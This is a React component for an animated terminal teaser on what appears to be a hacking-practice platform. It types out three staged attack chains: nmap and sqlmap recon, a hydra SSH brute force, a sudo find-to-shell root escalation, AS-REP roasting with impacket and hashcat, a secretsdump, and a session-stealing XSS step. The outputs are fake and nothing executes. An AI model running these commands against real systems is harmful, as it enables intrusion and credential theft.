/**
 * RunningBoxPreview — a self-typing terminal teaser shown to first-timers on
 * /box so they see the payoff before signing in. Clearly labelled "// preview"
 * so it is never mistaken for a live shell.
 */
import { useEffect, useRef, useState } from "react";

const SEQUENCES = [
    {
        label: "linux recon → root",
        lines: [
            { t: "prompt", txt: "nmap -sV --top-ports 20 10.10.11.42" },
            { t: "out", txt: "PORT     STATE SERVICE     VERSION" },
            { t: "out", txt: "22/tcp   open  ssh         OpenSSH 8.9p1" },
            { t: "out", txt: "80/tcp   open  http        nginx 1.18.0" },
            { t: "out", txt: "3306/tcp open  mysql       MySQL 8.0.32" },
            { t: "prompt", txt: "sqlmap -u \"http://10.10.11.42/?id=1\" --batch --dbs" },
            { t: "ok", txt: "[+] the back-end DBMS is MySQL" },
            { t: "ok", txt: "available databases [2]: information_schema, webapp" },
            { t: "prompt", txt: "hydra -l admin -P rockyou.txt 10.10.11.42 ssh" },
            { t: "ok", txt: "[22][ssh] login: admin   password: hunter2" },
            { t: "prompt", txt: "sudo -l && sudo /usr/bin/find . -exec /bin/sh \\; -quit" },
            { t: "root", txt: "# id  →  uid=0(root)   ·   cat /root/root.txt  →  HC{r00t3d_in_90s}" },
        ],
    },
    {
        label: "windows / active directory",
        lines: [
            { t: "prompt", txt: "nxc smb 10.10.10.5 -u guest -p ''" },
            { t: "out", txt: "SMB  10.10.10.5:445  DC01  [*] Windows Server 2022" },
            { t: "out", txt: "SMB  10.10.10.5:445  DC01  domain: corp.local" },
            { t: "prompt", txt: "impacket-GetNPUsers corp.local/ -usersfile u.txt -no-pass" },
            { t: "ok", txt: "[+] $krb5asrep$23$svc-web@CORP.LOCAL:9f2c..." },
            { t: "prompt", txt: "hashcat -m 18200 asrep.hash rockyou.txt" },
            { t: "ok", txt: "svc-web:Summer2025!" },
            { t: "prompt", txt: "impacket-secretsdump corp.local/svc-web@10.10.10.5" },
            { t: "root", txt: "Administrator:500:aad3b...:e19ccf75ee54e06b...:::" },
        ],
    },
    {
        label: "web exploitation chain",
        lines: [
            { t: "prompt", txt: "ffuf -u https://target/FUZZ -w common.txt -mc 200" },
            { t: "out", txt: "admin           [Status: 200]" },
            { t: "out", txt: ".git/config     [Status: 200]" },
            { t: "prompt", txt: "curl -s https://target/.git/config" },
            { t: "ok", txt: "[+] exposed .git — dumping source" },
            { t: "prompt", txt: "python3 xss_chain.py --steal-session" },
            { t: "ok", txt: "[+] admin session token captured" },
            { t: "root", txt: "flag{w3b_pwn3d_via_xss_to_rce}" },
        ],
    },
];

export default function RunningBoxPreview() {
    const [visible, setVisible] = useState([]);
    const [typed, setTyped] = useState("");
    const [seqIdx, setSeqIdx] = useState(0);
    const idx = useRef(0);
    const char = useRef(0);
    const seq = useRef(0);

    useEffect(() => {
        let timer;
        const tick = () => {
            const LINES = SEQUENCES[seq.current].lines;
            const i = idx.current;
            if (i >= LINES.length) {
                // pause, then advance to the next scenario and restart the loop
                timer = setTimeout(() => {
                    seq.current = (seq.current + 1) % SEQUENCES.length;
                    setSeqIdx(seq.current);
                    idx.current = 0; char.current = 0;
                    setVisible([]); setTyped("");
                    timer = setTimeout(tick, 400);
                }, 2600);
                return;
            }
            const line = LINES[i];
            if (line.t === "prompt") {
                if (char.current < line.txt.length) {
                    char.current += 1;
                    setTyped(line.txt.slice(0, char.current));
                    timer = setTimeout(tick, 34);
                } else {
                    setVisible((v) => [...v, line]);
                    setTyped("");
                    char.current = 0;
                    idx.current += 1;
                    timer = setTimeout(tick, 320);
                }
            } else {
                setVisible((v) => [...v, line]);
                idx.current += 1;
                timer = setTimeout(tick, 130);
            }
        };
        timer = setTimeout(tick, 500);
        return () => clearTimeout(timer);
    }, []);

    const color = (t) =>
        t === "prompt" ? "text-slate-200"
        : t === "ok" ? "text-emerald-300"
        : t === "root" ? "text-cyan-300"
        : "text-slate-500";

    return (
        <div className="font-mono text-[12px] leading-relaxed text-left w-full max-w-xl mx-auto" data-testid="box-preview-anim" aria-hidden="true">
            <div className="text-[9px] uppercase tracking-widest text-slate-400 mb-2 flex items-center gap-2">
                <span>// preview · what a live box looks like</span>
                <span className="text-cyan-500/70" data-testid="box-preview-scenario">· {SEQUENCES[seqIdx].label}</span>
            </div>
            {visible.map((l, i) => (
                <div key={i} className={color(l.t)}>
                    {l.t === "prompt" ? <span className="text-cyan-400">┌─[root@box]─# </span> : null}
                    {l.txt}
                </div>
            ))}
            {typed && (
                <div className="text-slate-200">
                    <span className="text-cyan-400">┌─[root@box]─# </span>{typed}
                    <span className="inline-block w-[7px] h-[13px] bg-cyan-400 ml-0.5 animate-pulse align-middle" />
                </div>
            )}
        </div>
    );
}
